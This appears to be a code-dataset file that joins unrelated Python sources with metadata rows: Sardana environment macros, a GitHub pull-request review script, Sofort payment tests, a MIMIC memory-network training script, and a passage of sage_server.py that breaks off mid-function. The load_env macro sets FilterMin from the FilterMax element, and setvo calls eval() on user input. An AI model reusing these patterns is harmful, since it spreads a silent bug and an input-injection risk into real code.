"""Return metadata as a dictionary.
This is a static method. You can use it to get the metadata in
dictionary format for an impact function.
:returns: A dictionary representing all the metadata for the
concrete impact function.
:rtype: dict
"""
return dict_meta
| gpl-3.0 | -3,033,253,050,380,177,000 | 37.888889 | 78 | 0.56119 | false |
sagiss/sardana | src/sardana/macroserver/macros/env.py | 1 | 11795 | ##############################################################################
##
## This file is part of Sardana
##
## http://www.sardana-controls.org/
##
## Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
## Sardana is free software: you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## Sardana is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""Environment related macros"""
__all__ = ["dumpenv", "load_env", "lsenv", "senv", "usenv"]
__docformat__ = 'restructuredtext'
from taurus.console.list import List
from sardana.macroserver.macro import *
################################################################################
#
# Environment related macros
#
################################################################################
from lxml import etree
def reprValue(v, max=74):
# cut long strings
v = str(v)
if len(v) > max:
v = v[:max] + ' [...]'
return v
class dumpenv(Macro):
"""Dumps the complete environment"""
def run(self):
env = self.getGlobalEnv()
out = List(['Name','Value','Type'])
for k,v in env.iteritems():
str_v = reprValue(v)
type_v = type(v).__name__
out.appendRow([str(k), str_v, type_v])
for line in out.genOutput():
self.output(line)
class lsvo(Macro):
"""Lists the view options"""
def run(self):
vo = self.getViewOptions()
out = List(['View option', 'Value'])
for key, value in vo.items():
out.appendRow([key, str(value)])
for line in out.genOutput():
self.output(line)
class setvo(Macro):
"""Sets the given view option to the given value"""
param_def = [['name', Type.String, None, 'View option name'],
['value', Type.String, None, 'View option value']]
def run(self, name, value):
try:
value = eval(value)
except:
pass
self.setViewOption(name, value)
class usetvo(Macro):
"""Resets the value of the given view option"""
param_def = [['name', Type.String, None, 'View option name']]
def run(self, name):
self.resetViewOption(name)
class lsenv(Macro):
"""Lists the environment in alphabetical order"""
param_def = [
['macro_list',
ParamRepeat(['macro', Type.MacroClass, None, 'macro name'], min=0),
None, 'List of macros to show environment'],
]
def prepare(self, macro_list, **opts):
self.table_opts = opts
def run(self, macro_list):
# list the environment for the current door
if len(macro_list) == 0:
# list All the environment for the current door
out = List(['Name', 'Value', 'Type'])
env = self.getAllDoorEnv()
names_list = list(env.keys())
names_list.sort(key=str.lower)
for k in names_list:
str_val = self.reprValue(env[k])
type_name = type(env[k]).__name__
out.appendRow([k, str_val, type_name])
# list the environment for the current door for the given macros
else:
out = List(['Macro', 'Name', 'Value', 'Type'])
for macro in macro_list:
env = self.getEnv(key=None, macro_name=macro.name)
names_list = list(env.keys())
names_list.sort(key=str.lower)
for k in names_list:
str_val = self.reprValue(env[k])
type_name = type(env[k]).__name__
out.appendRow([macro.name, k, str_val, type_name])
for line in out.genOutput():
self.output(line)
def reprValue(self, v, max=54):
# cut long strings
v = str(v)
if len(v) > max: v = '%s [...]' % v[:max]
return v
class senv(Macro):
"""Sets the given environment variable to the given value"""
param_def = [['name', Type.Env, None,
'Environment variable name. Can be one of the following:\n' \
' - <name> - global variable\n' \
' - <full door name>.<name> - variable value for a specific door\n' \
' - <macro name>.<name> - variable value for a specific macro\n' \
' - <full door name>.<macro name>.<name> - variable value for a specific macro running on a specific door'],
['value_list',
ParamRepeat(['value', Type.String, None, 'environment value item'], min=1),
None, 'value(s). one item will eval to a single element. More than one item will eval to a tuple of elements'],
]
def run(self, env, value):
if len(value) == 1:
value = value[0]
else:
value = '(%s)' % ', '.join(value)
k,v = self.setEnv(env, value)
line = '%s = %s' % (k, str(v))
self.output(line)
class usenv(Macro):
"""Unsets the given environment variable"""
param_def = [
['environment_list',
ParamRepeat(['env', Type.Env, None, 'Environment variable name'], min=1),
None, 'List of environment items to be removed'],
]
def run(self, env):
self.unsetEnv(env)
self.output("Success!")
class load_env(Macro):
""" Read environment variables from config_env.xml file"""
def run(self):
doc = etree.parse("config_env.xml")
root = doc.getroot()
for element in root:
if element.find("./name").text == "auto_filter":
self.output("Loading auto_filter variables:")
filter_max_elem = element.find(".//FilterMax")
if filter_max_elem is not None:
filter_max = filter_max_elem.text
self.setEnv("FilterMax", filter_max)
self.output("FilterMax loaded")
else:
self.output("FilterMax not found")
filter_min_elem = element.find(".//FilterMin")
if filter_min_elem is not None:
filter_min = filter_max_elem.text
self.setEnv("FilterMin", filter_min)
self.output("FilterMin loaded")
else:
self.output("FilterMin not found")
filter_delta_elem = element.find(".//FilterDelta")
if filter_delta_elem is not None:
filter_delta = filter_delta_elem.text
self.setEnv("FilterDelta", filter_delta)
self.output("FilterDelta loaded")
else:
self.output("FilterDelta not found")
filter_signal_elem = element.find(".//FilterSignal")
if filter_signal_elem is not None:
filter_signal = filter_signal_elem.text
self.setEnv("FilterSignal", filter_signal)
self.output("FilterSignal loaded")
else:
self.output("FilterSignal not found")
filter_absorber_elem = element.find(".//FilterAbsorber")
if filter_absorber_elem is not None:
filter_absorber = filter_absorber_elem.text
self.setEnv("FilterAbsorber", filter_absorber)
self.output("FilterAbsorber loaded")
else:
self.output("FilterAbsorber not found")
auto_filter_elem = element.find(".//AutoFilter")
if auto_filter_elem is not None:
auto_filter = auto_filter_elem.text
self.setEnv("AutoFilter", auto_filter)
self.output("AutoFilter loaded")
else:
self.output("AutoFilter not found")
if element.find("./name").text == "auto_beamshutter":
self.output("Loading auto_beamshutter variables:")
auto_beamshutter_elem = element.find(".//AutoBeamshutter")
if auto_beamshutter_elem is not None:
auto_beamshutter = auto_beamshutter_elem.text
self.setEnv("AutoBeamshutter", auto_beamshutter)
self.output("AutoBeamshutter loaded")
else:
self.output("AutoBeamshutter not found")
beamshutter_limit_elem = element.find(".//BeamshutterLimit")
if beamshutter_limit_elem is not None:
beamshutter_limit = beamshutter_limit_elem.text
self.setEnv("BeamshutterLimit", beamshutter_limit)
self.output("BeamshutterLimit loaded")
else:
self.output("BeamshutterLimit not found")
beamshutter_signal_elem = element.find(".//BeamshutterSignal")
if beamshutter_signal_elem is not None:
beamshutter_signal = beamshutter_signal_elem.text
self.setEnv("BeamshutterSignal", beamshutter_signal)
self.output("BeamshutterSignal loaded")
else:
self.output("BeamshutterSignal not found")
beamshutter_time_elem = element.find(".//BeamshutterTime")
if beamshutter_time_elem is not None:
beamshutter_time = beamshutter_time_elem.text
self.setEnv("BeamshutterTime", beamshutter_time)
self.output("BeamshutterTime loaded")
else:
self.output("BeamshutterTime not found")
if element.find("./name").text == "exafs":
self.output("Loading exafs variables:")
exafs_int_times_elem = element.find(".//ExafsIntTimes")
if exafs_int_times_elem is not None:
exafs_int_times = exafs_int_times_elem.text
self.setEnv("ExafsIntTimes", exafs_int_times)
self.output("ExafsIntTimes loaded")
else:
self.output("ExafsIntTimes not found")
exafs_nb_intervals_elem = element.find(".//ExafsNbIntervals")
if exafs_nb_intervals_elem is not None:
exafs_nb_intervals = exafs_nb_intervals_elem.text
self.setEnv("ExafsNbIntervals", exafs_nb_intervals)
self.output("ExafsNbIntervals loaded")
else:
self.output("ExafsNbIntervals not found")
exafs_regions_elem = element.find(".//ExafsRegions")
if exafs_regions_elem is not None:
exafs_regions = exafs_regions_elem.text
self.setEnv("ExafsRegions", exafs_regions)
self.output("ExafsRegions loaded")
else:
self.output("ExafsRegions not found")
misc_tree = root.find("./miscellaneous")
if misc_tree is not None:
for parameter in misc_tree:
if parameter.tag != "name":
self.setEnv(parameter.tag, parameter.text)
| lgpl-3.0 | -1,919,864,048,921,423,600 | 39.954861 | 129 | 0.527596 | false |
easybeta/github-autopullrequest | github-autopullrequest.py | 1 | 10757 | '''
github-autopullrequest.py - Created by Eric Betancourt [[email protected]]
This script helps automate code reviews of pull requests to a specified GitHub repositories.
Using the GitHub api (documented at https://api.github.com/) the script will scan the
currently open pull requests for a specified working directory and reports whether or not
the open pull request contain 'interesting items', which will be specified in config file
titled "interesting-config.json".
Examples of Interesting Items:
- Any change to the specified files or directories
- Does not contain changes to any files in the specified directory
- Any added or deleted lines contain the follow words (not as substrings of larger words):
/dev/null
raise
.write
Example
> review cuckoobox/cuckoo
https://api.github.com/repos/cuckoobox/cuckoo/pulls/310 - Not Interesting
https://api.github.com/repos/cuckoobox/cuckoo/pulls/308 - Interesting
Found {'+':'raise'} on line 30 in modules/processing/analysisinfo.py
Found {'+':'raise'} on line 33 in modules/processing/analysisinfo.py
'''
#! /usr/bin/python
import sys, re
import requests
import json
# Default Configuration File
config_file = 'interesting-config.json'
# Default Working Directory
working_dir = []
verbose = True
interestingItems = []
# Multiline compare checks n previous and upcoming lines around the line being compared.
def multiline_compare(array, idx, mod_idx, check_int):
match = True
check_count = -abs(check_int)
while check_count <= abs(check_int):
if array[idx + check_count] and array[mod_idx + check_count]:
if array[idx + check_count] != array[mod_idx + check_count]:
match = False
break
check_count = check_count + 1
return match
# Determine line number for the modified code. Begin by checking the patch info line, if
# the current line was just added, use the '+' start number, if the current line was
# removed , use the '-' start number. Then parse through patch lines of code, incrementing
# the counter on each unmodified line, and on each '+' line (if current line was added), or
# on each '-' line (if current line was removed).
def determine_line(patch_array, mod_symbol, mod_idx):
line_count = 0
for idx, line in enumerate(patch_array):
if line[0] == '@':
if mod_symbol == '+':
line_count = int(re.match(r'.*\+([0-9]+),', line).group(1))
else:
mod_symbol = '-'
line_count = int(re.match(r'.*-([0-9]+),', line).group(1))
line_count = line_count - 1
else:
if (line[0] == ' ') or \
(line[0] == '+' and mod_symbol=='+') or \
(line[0] == '-' and mod_symbol=='-'):
line_count = line_count + 1
if line == patch_array[mod_idx]:
if multiline_compare(patch_array, idx, mod_idx, 3):
break
return line_count
# Search Keywords by first loading in the modified files JSON data from github. Isolate 'patch'
# JSON data and search each modified line for each keyword using regular expressions,
# a match for the word plus any surrounding non-white characters is first captured.
# This captured string is then compared to the original keyword to verify that it's not a
# substring. Line number is then determined and the appropriate description is written up
# to be displayed.
def search_keyword(html_request, keywords):
keyword_found = False
description = []
idx = 0
while True:
try:
repoItem = json.loads(html_request.text or html_request.content)[idx]
patchItem = repoItem['patch'].encode('utf8').split('\n')
line_idx = 0
for line in patchItem:
for word in keywords:
if word[0].isalpha(): # if keyword is standalone function
search_string = '(\\S*%s\\S*)' % word
elif word[0] == '.' or word[0] == '/': # if keyword is sub-function or directory
search_string = '(%s\\w*)' % word
else:
search_string = word
if line[0] == '+' or line[0] == '-':
matches = re.findall(search_string, line, re.M)
if matches:
for match in matches:
if match in word:
line_num = determine_line(patchItem, line[0], line_idx)
if verbose:
description.append("Found {'%s':'%s'} on line %d in %s" % (line[0], match, line_num, repoItem['filename']))
#description.append('%s' % line)
keyword_found = True
#else: # Show failed matches (usually when keyword is sub-string)
#if verbose:
#print "%s - line %d - ['%s':'%s']\n%s - %s" % (repoItem['filename'], determine_line(patchItem, line[0], line_idx), match, word, line, match)
line_idx = line_idx + 1
except IndexError:
break
idx = idx + 1
return keyword_found, description
# Check Filename by requesting modified files JSON data from github. Then search each 'filename'
# entry in the JSON pulls data.
def check_filename(html_request, filenames):
name_found = False
description = []
idx = 0
while True:
try:
repoItem = json.loads(html_request.text or html_request.content)[idx]
for name in filenames:
if name in repoItem['filename']:
description.append('Located %s in %s' % (name, repoItem['filename']))
name_found = True
except IndexError:
break
idx = idx + 1
return name_found, description
# Determine Interesting by first pulling pulls 'files' JSON Data. Then call sub-functions check_filename()
# and search_keyword() to determine whether the pull is interesting.
def determine_interesting(pull_id, curr_working_dir):
interest_found = 'Not Interesting'
file_changes_good, file_changes_bad, line_keywords = [], [], []
description = []
for idx, item in enumerate(interestingItems):
if item['type'] == 'fileChange' and item['modifyOk']:
file_changes_good.append(item['keyword'])
elif item['type'] == 'fileChange' and not item['modifyOk']:
file_changes_bad.append(item['keyword'])
elif item['type'] == 'lineKeyword':
line_keywords.append(item['keyword'])
try:
html_request = requests.get('https://api.github.com/repos/%s/pulls/%d/files?page=%d&per_page=100' % (curr_working_dir, pull_id, 1))
if(html_request.ok and html_request.text != '[]'):
# Any change to these files or directories:
result, output = check_filename(html_request, file_changes_good)
if result == True:
interest_found = 'Interesting'
description.extend(output)
# Does not contain changes to these files or directories:
for fileentry in file_changes_bad:
result, output = check_filename(html_request, fileentry)
if result != True:
interest_found = 'Interesting'
description.append("No changes to entry %s" % fileentry)
# Any added or deleted lines contain the follow words (not as substrings of larger words):
result, output = search_keyword(html_request, line_keywords)
if result == True:
interest_found = 'Interesting'
description.extend(output)
except Exception as e:
print "Error while executing github-autopullrequest.py during pull '%s/pulls/%d'." % (curr_working_dir, pull_id)
print e
return interest_found, description
# Main class determines what pulls are related to the working_dir. It then determines the interesting
# of each pull. Results with line number are then printed to the terminal.
def main(argv):
global working_dirs, verbose, interestingItems
try:
with open(config_file, 'r') as json_data:
readin = json.load(json_data)
working_dirs = readin['workingDirectory']
verbose = readin['verbose']
interestingItems = readin['interestingItems']
if verbose:
print 'Working Directory:'
for idx, line in enumerate(working_dirs):
print '\t%s' % line['name']
print 'Verbose:', verbose
print 'Interesting Items:'
for idx, line in enumerate(interestingItems):
print '\t%s - %s' % (line['type'], line['keyword'])
json_data.close()
except Exception as e:
print e
for idx, dir in enumerate(working_dirs):
curr_dir = str(dir['name'])
pageNum = 1
while True:
try:
r = requests.get('https://api.github.com/repos/%s/pulls?page=%d&per_page=100' % (curr_dir, pageNum))
if(r.ok and r.text != '[]'):
print "Pull Request Urls - '%s' - Page %d:" % (curr_dir, pageNum)
idx = 0
while True:
try:
repoItem = json.loads(r.text or r.content)[idx]
pull_interest, interest_description = determine_interesting(repoItem['number'], curr_dir)
print repoItem['url'] + ' - ' + pull_interest
for line in interest_description:
print '\t' + line
except IndexError:
break
idx = idx + 1
else:
match = re.search('\"message\":\"(.*)\",', r.text)
if match:
print "Unable to perform Pulls Request on '%s' - '%s'" % (curr_dir, match.group(1))
else:
print "Pulls Requests Complete for '%s'." % curr_dir
break
except Exception as e:
print "Error while executing github-autopullrequest.py with directory '%s'." % curr_dir
print e
break
pageNum = pageNum + 1
if __name__ == '__main__':
main(sys.argv)
| mpl-2.0 | -5,248,136,591,977,777,000 | 42.550607 | 181 | 0.561309 | false |
artursmet/django-payments | payments/sofort/test_sofort.py | 1 | 3494 | from __future__ import unicode_literals
from unittest import TestCase
from mock import patch, MagicMock, Mock
import json
from . import SofortProvider
from .. import RedirectNeeded
SECRET = 'abcd1234'
CLIENT_ID = '1234'
PROJECT_ID = 'abcd'
class Payment(Mock):
id = 1
variant = 'sagepay'
currency = 'USD'
total = 100
status = 'waiting'
transaction_id = None
captured_amount = 0
billing_first_name = 'John'
def get_process_url(self):
return 'http://example.com'
def get_failure_url(self):
return 'http://cancel.com'
def get_success_url(self):
return 'http://success.com'
def change_status(self, status):
self.status = status
class TestSofortProvider(TestCase):
def setUp(self):
self.payment = Payment()
self.provider = SofortProvider(
id=CLIENT_ID, project_id=PROJECT_ID, key=SECRET)
@patch('xmltodict.parse')
@patch('requests.post')
def test_provider_raises_redirect_needed_on_success(
self, mocked_post, mocked_parser):
response = MagicMock()
response.status_code = 200
mocked_post.return_value = response
mocked_parser.return_value = {
'new_transaction': {
'payment_url': 'http://payment.com'}}
with self.assertRaises(RedirectNeeded) as exc:
self.provider.get_form(self.payment)
@patch('xmltodict.parse')
@patch('requests.post')
@patch('payments.sofort.redirect')
def test_provider_redirects_on_success(
self, mocked_redirect, mocked_post, mocked_parser):
transaction_id = '1234'
request = MagicMock()
request.GET = {'trans': transaction_id}
mocked_parser.return_value = {
'transactions': {
'transaction_details': {
'status': 'ok',
'sender': {
'holder': 'John Doe',
'country_code': 'EN'}}}}
self.provider.process_data(self.payment, request)
self.assertEqual(self.payment.status, 'confirmed')
self.assertEqual(self.payment.captured_amount, self.payment.total)
self.assertEqual(self.payment.transaction_id, transaction_id)
@patch('xmltodict.parse')
@patch('requests.post')
@patch('payments.sofort.redirect')
def test_provider_redirects_on_failure(
self, mocked_redirect, mocked_post, mocked_parser):
transaction_id = '1234'
request = MagicMock()
request.GET = {'trans': transaction_id}
mocked_parser.return_value = {}
self.provider.process_data(self.payment, request)
self.assertEqual(self.payment.status, 'rejected')
self.assertEqual(self.payment.captured_amount, 0)
self.assertEqual(self.payment.transaction_id, transaction_id)
@patch('xmltodict.parse')
@patch('requests.post')
def test_provider_refunds_payment(self, mocked_post, mocked_parser):
self.payment.extra_data = json.dumps({
'transactions': {
'transaction_details': {
'status': 'ok',
'sender': {
'holder': 'John Doe',
'country_code': 'EN',
'bic': '1234',
'iban': 'abcd'}}}})
mocked_parser.return_value = {}
self.provider.refund(self.payment)
self.assertEqual(self.payment.status, 'refunded')
| bsd-3-clause | -8,422,943,295,853,516,000 | 32.27619 | 74 | 0.589868 | false |
thaihungle/deepexp | meta_mann/run_mimic.py | 1 | 7331 | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # No logging TF
import tensorflow as tf
import numpy as np
import time
import sys
from mann import memory_augmented_neural_network
from Utils.mimic_gen import MimicGenerator
from Utils.Metrics import accuracy_instance2
from Utils import label_encoder as le
NUM_GPU=2
def omniglot():
# sess = tf.InteractiveSession()
##Global variables for Omniglot Problem
nb_reads = 4
controller_size = 200 # hidden dim for controller
memory_shape = (1024, 128)
batch_size = 16
train_max_iter = 100000
# Load Data
generator = MimicGenerator('./data/mimic/small/', batch_size=batch_size)
input_ph = tf.placeholder(dtype=tf.float32, shape=(batch_size, generator.num_step, generator.input_size)) # (batch_size, time, input_dim)
target_ph = tf.placeholder(dtype=tf.float32, shape=(batch_size, generator.num_step, generator.output_size)) # (batch_size, time)(label_indices)-->later convert onehot
output_var, output_var_flatten, params = memory_augmented_neural_network(input_ph, target_ph, batch_size=batch_size,
nb_class=generator.output_size,
memory_shape=memory_shape,
controller_size=controller_size,
input_size=generator.input_size, nb_reads=nb_reads)
print('Compiling the Model')
with tf.variable_scope("Weights", reuse=True):
W_key = tf.get_variable('W_key', shape=(nb_reads, controller_size, memory_shape[1]))
b_key = tf.get_variable('b_key', shape=(nb_reads, memory_shape[1]))
W_add = tf.get_variable('W_add', shape=(nb_reads, controller_size, memory_shape[1]))
b_add = tf.get_variable('b_add', shape=(nb_reads, memory_shape[1]))
W_sigma = tf.get_variable('W_sigma', shape=(nb_reads, controller_size, 1))
b_sigma = tf.get_variable('b_sigma', shape=(nb_reads, 1))
#W_gamma = tf.get_variable('W_gamma', shape=(controller_size, 1))
#b_gamma = tf.get_variable('b_gamma', shape=[1])
W_xh = tf.get_variable('W_xh', shape=(generator.input_size + generator.output_size, 4 * controller_size))
b_h = tf.get_variable('b_xh', shape=(4 * controller_size))
W_o = tf.get_variable('W_o', shape=(controller_size + nb_reads * memory_shape[1], generator.output_size))
b_o = tf.get_variable('b_o', shape=(generator.output_size))
W_rh = tf.get_variable('W_rh', shape=(nb_reads * memory_shape[1], 4 * controller_size))
W_hh = tf.get_variable('W_hh', shape=(controller_size, 4 * controller_size))
# gamma = tf.get_variable('gamma', shape=[1], initializer=tf.constant_initializer(0.95))
params = [W_key, b_key, W_add, b_add, W_sigma, b_sigma, W_xh, W_rh, W_hh, b_h, W_o, b_o]
# output_var = tf.cast(output_var, tf.int32)
target_ph_oh = target_ph
print('Output, Target shapes: {} {}'.format(output_var.get_shape().as_list(), target_ph_oh.get_shape().as_list()))
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=output_var, labels=target_ph_oh), name="cost")
opt = tf.train.AdamOptimizer(learning_rate=1e-3)
# opt = tf.train.RMSPropOptimizer(learning_rate=1e-4,momentum=0.9)
train_step = opt.minimize(cost, var_list=params)
accuracies = accuracy_instance2(tf.round(output_var), target_ph, batch_size=generator.batch_size)
#
# #average number of predicts on each class (should be equal = nb_sample_per_class)
# sum_out = tf.reduce_sum(
# tf.reshape(tf.one_hot(tf.round(output_var, axis=2), depth=base_code*base_code), (-1, base_code*base_code)),
# axis=0)
print('Done')
tf.summary.scalar('cost', cost)
# for i in range(generator.nb_samples_per_class):
# tf.summary.scalar('accuracy-' + str(i), accuracies[i])
tf.summary.scalar('accuracy', accuracies)
merged = tf.summary.merge_all()
t0 = time.time()
scores, accs = [], 0
init=tf.global_variables_initializer()
# 'Saver' op to save and restore all the variables
saver = tf.train.Saver()
model_path = './tmp/mimic_save/'
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)
with tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False,
device_count={'CPU': 10, 'GPU':NUM_GPU},
gpu_options=gpu_options),
) as sess:
try:
saver.restore(sess, model_path)
print("Model restored from file")
except Exception as e:
print('no thing to be loaded')
sess.run(init)
# writer = tf.summary.FileWriter('/tmp/tensorflow', graph=tf.get_default_graph())
train_writer = tf.summary.FileWriter('./tmp/mimic_train_report/', sess.graph)
test_writer = tf.summary.FileWriter('./tmp/mimic_test_report/', sess.graph)
print ('Training the model')
try:
for i, (batch_input, batch_output) in generator:
start=time.time()
feed_dict = {
input_ph: batch_input,
target_ph: batch_output
}
# print batch_input.shape, batch_output.shape
if i<train_max_iter:
train_step.run(feed_dict)
score = cost.eval(feed_dict)
acc = accuracies.eval(feed_dict)
# yp = tf.round(output_var).eval(feed_dict)
# yr = target_ph.eval(feed_dict)
# x = generator.decode_onehot_input(batch_input)
# yp = generator.decode_onehot_output(yp)
# yr = generator.decode_onehot_output(yr)
# print('with x ... = {}, we have: \n {} vs {}'.format(x[0], yp,yr))
summary = merged.eval(feed_dict)
if i<train_max_iter:
train_writer.add_summary(summary, i)
else:
test_writer.add_summary(summary, i)
generator.is_training=False
print('time {} s for this loop {}'.format(time.time()-start,str(i)+ ' '+ str(acc)))
scores.append(score)
accs += acc
if i > 0 and not (i % 100):
print(accs / 100.0)
print('Episode %05d: %.6f' % (i, np.mean(scores)))
scores, accs = [], 0
if i > 0 and not (i%1000):
save_path = saver.save(sess, model_path)
print("Model saved in file: %s" % save_path)
le.chars2id={}
except KeyboardInterrupt:
print (str(time.time() - t0))
pass
if __name__ == '__main__':
try:
device_name = sys.argv[1] # Choose device from cmd line. Options: gpu or cpu
print(device_name)
except Exception as e:
device_name = "cpu"
if device_name == "gpu":
print('use gpu')
device_name = "/gpu:0"
else:
print('use cpu')
device_name = "/cpu:0"
with tf.device(device_name):
omniglot()
| mit | -2,511,329,116,676,375,600 | 41.871345 | 171 | 0.56718 | false |
timothyclemansinsea/smc | src/smc_sagews/smc_sagews/sage_server.py | 1 | 74536 | #!/usr/bin/env python
"""
sage_server.py -- unencrypted forking TCP server.
Note: I wrote functionality so this can run as root, create accounts on the fly,
and serve sage as those accounts. Doing this is horrendous from a security point of
view, and I'm definitely not doing this. None of that functionality is actually
used in https://cloud.sagemath.com!
For debugging, this may help:
killemall sage_server.py && sage --python sage_server.py -p 6000
"""
# NOTE: This file is GPL'd
# because it imports the Sage library. This file is not directly
# imported by anything else in Salvus; the Python process it runs is
# used over a TCP connection.
#########################################################################################
# Copyright (C) 2013 William Stein <[email protected]> #
# #
# Distributed under the terms of the GNU General Public License (GPL), version 2+ #
# #
# http://www.gnu.org/licenses/ #
#########################################################################################
# Add the path that contains this file to the Python load path, so we
# can import other files from there.
import os, sys, time
# used for clearing pylab figure
pylab = None
# Maximum number of distinct (non-once) output messages per cell; when this number is
# exceeded, an exception is raised; this reduces the chances of the user creating
# a huge unusable worksheet.
MAX_OUTPUT_MESSAGES = 256
# stdout, stderr, html, etc. that exceeds this many characters will be truncated to avoid
# killing the client.
MAX_STDOUT_SIZE = MAX_STDERR_SIZE = MAX_CODE_SIZE = MAX_HTML_SIZE = MAX_MD_SIZE = MAX_TEX_SIZE = 40000
MAX_OUTPUT = 150000
# We import the notebook interact, which we will monkey patch below,
# first, since importing later causes trouble in sage>=5.6.
import sagenb.notebook.interact
# Standard imports.
import json, resource, shutil, signal, socket, struct, \
tempfile, time, traceback, pwd
import sage_parsing, sage_salvus
uuid = sage_salvus.uuid
def unicode8(s):
# I evidently don't understand Python unicode... Do the following for now:
# TODO: see http://stackoverflow.com/questions/21897664/why-does-unicodeu-passed-an-errors-parameter-raise-typeerror for how to fix.
try:
return unicode(s, 'utf8')
except:
try:
return unicode(s)
except:
return s
LOGFILE = os.path.realpath(__file__)[:-3] + ".log"
PID = os.getpid()
from datetime import datetime
def log(*args):
#print("logging to %s"%LOGFILE)
try:
debug_log = open(LOGFILE, 'a')
mesg = "%s (%s): %s\n"%(PID, datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3], ' '.join([unicode8(x) for x in args]))
debug_log.write(mesg)
debug_log.flush()
except:
log("an error writing a log message (ignoring)")
# Determine the info object, if available. There's no good reason
# it wouldn't be available, unless a user explicitly deleted it, but
# we may as well try to be robust to this, especially if somebody
# were to try to use this server outside of cloud.sagemath.com.
_info_path = os.path.join(os.environ['SMC'], 'info.json')
if os.path.exists(_info_path):
INFO = json.loads(open(_info_path).read())
else:
INFO = {}
if 'base_url' not in INFO:
INFO['base_url'] = ''
# Configure logging
#logging.basicConfig()
#log = logging.getLogger('sage_server')
#log.setLevel(logging.INFO)
# A CoffeeScript version of this function is in misc_node.coffee.
import hashlib
def uuidsha1(data):
sha1sum = hashlib.sha1()
sha1sum.update(data)
s = sha1sum.hexdigest()
t = 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'
r = list(t)
j = 0
for i in range(len(t)):
if t[i] == 'x':
r[i] = s[j]; j += 1
elif t[i] == 'y':
# take 8 + low order 3 bits of hex number.
r[i] = hex( (int(s[j],16)&0x3) |0x8)[-1]; j += 1
return ''.join(r)
# A tcp connection with support for sending various types of messages, especially JSON.
class ConnectionJSON(object):
def __init__(self, conn):
assert not isinstance(conn, ConnectionJSON) # avoid common mistake -- conn is supposed to be from socket.socket...
self._conn = conn
def close(self):
self._conn.close()
def _send(self, s):
length_header = struct.pack(">L", len(s))
self._conn.send(length_header + s)
def send_json(self, m):
m = json.dumps(m)
log(u"sending message '", truncate_text(m, 256), u"'")
self._send('j' + m)
return len(m)
def send_blob(self, blob):
s = uuidsha1(blob)
self._send('b' + s + blob)
return s
def send_file(self, filename):
log("sending file '%s'"%filename)
f = open(filename, 'rb')
data = f.read()
f.close()
return self.send_blob(data)
def _recv(self, n):
#print("_recv(%s)"%n)
for i in range(20): # see http://stackoverflow.com/questions/3016369/catching-blocking-sigint-during-system-call
try:
#print "blocking recv (i = %s), pid=%s"%(i, os.getpid())
r = self._conn.recv(n)
#log("n=%s; received: '%s' of len %s"%(n,r, len(r)))
return r
except socket.error as (errno, msg):
#print("socket.error, msg=%s"%msg)
if errno != 4:
raise
raise EOFError
def recv(self):
n = self._recv(4)
if len(n) < 4:
raise EOFError
n = struct.unpack('>L', n)[0] # big endian 32 bits
s = self._recv(n)
while len(s) < n:
t = self._recv(n - len(s))
if len(t) == 0:
raise EOFError
s += t
if s[0] == 'j':
try:
return 'json', json.loads(s[1:])
except Exception as msg:
log("Unable to parse JSON '%s'"%s[1:])
raise
elif s[0] == 'b':
return 'blob', s[1:]
raise ValueError("unknown message type '%s'"%s[0])
def truncate_text(s, max_size):
if len(s) > max_size:
return s[:max_size] + "[...]", True
else:
return s, False
def truncate_text_warn(s, max_size, name):
r"""
Truncate text if too long and format a warning message.
INPUT:
- ``s`` -- string to be truncated
- ``max-size`` - integer truncation limit
- ``name`` - string, name of limiting parameter
OUTPUT:
a triple:
- string -- possibly truncated input string
- boolean -- true if input string was truncated
- string -- warning message if input string was truncated
"""
tmsg = "WARNING: Output: %s truncated by %s to %s. Type 'smc?' to learn how to raise the output limit."
lns = len(s)
if lns > max_size:
tmsg = tmsg%(lns, name, max_size)
return s[:max_size] + "[...]", True, tmsg
else:
return s, False, ''
class Message(object):
def _new(self, event, props={}):
m = {'event':event}
for key, val in props.iteritems():
if key != 'self':
m[key] = val
return m
def start_session(self):
return self._new('start_session')
def session_description(self, pid):
return self._new('session_description', {'pid':pid})
def send_signal(self, pid, signal=signal.SIGINT):
return self._new('send_signal', locals())
def terminate_session(self, done=True):
return self._new('terminate_session', locals())
def execute_code(self, id, code, preparse=True):
return self._new('execute_code', locals())
def execute_javascript(self, code, obj=None, coffeescript=False):
return self._new('execute_javascript', locals())
def output(self, id,
stdout = None,
stderr = None,
code = None,
html = None,
javascript = None,
coffeescript = None,
interact = None,
md = None,
tex = None,
d3 = None,
file = None,
raw_input = None,
obj = None,
once = None,
hide = None,
show = None,
events = None,
clear = None,
delete_last = None,
done = False # CRITICAL: done must be specified for multi-response; this is assumed by sage_session.coffee; otherwise response assumed single.
):
m = self._new('output')
m['id'] = id
t = truncate_text_warn
did_truncate = False
import sage_server # we do this so that the user can customize the MAX's below.
if code is not None:
code['source'], did_truncate, tmsg = t(code['source'], sage_server.MAX_CODE_SIZE, 'MAX_CODE_SIZE')
m['code'] = code
if stderr is not None and len(stderr) > 0:
m['stderr'], did_truncate, tmsg = t(stderr, sage_server.MAX_STDERR_SIZE, 'MAX_STDERR_SIZE')
if stdout is not None and len(stdout) > 0:
m['stdout'], did_truncate, tmsg = t(stdout, sage_server.MAX_STDOUT_SIZE, 'MAX_STDOUT_SIZE')
if html is not None and len(html) > 0:
m['html'], did_truncate, tmsg = t(html, sage_server.MAX_HTML_SIZE, 'MAX_HTML_SIZE')
if md is not None and len(md) > 0:
m['md'], did_truncate, tmsg = t(md, sage_server.MAX_MD_SIZE, 'MAX_MD_SIZE')
if tex is not None and len(tex)>0:
tex['tex'], did_truncate, tmsg = t(tex['tex'], sage_server.MAX_TEX_SIZE, 'MAX_TEX_SIZE')
m['tex'] = tex
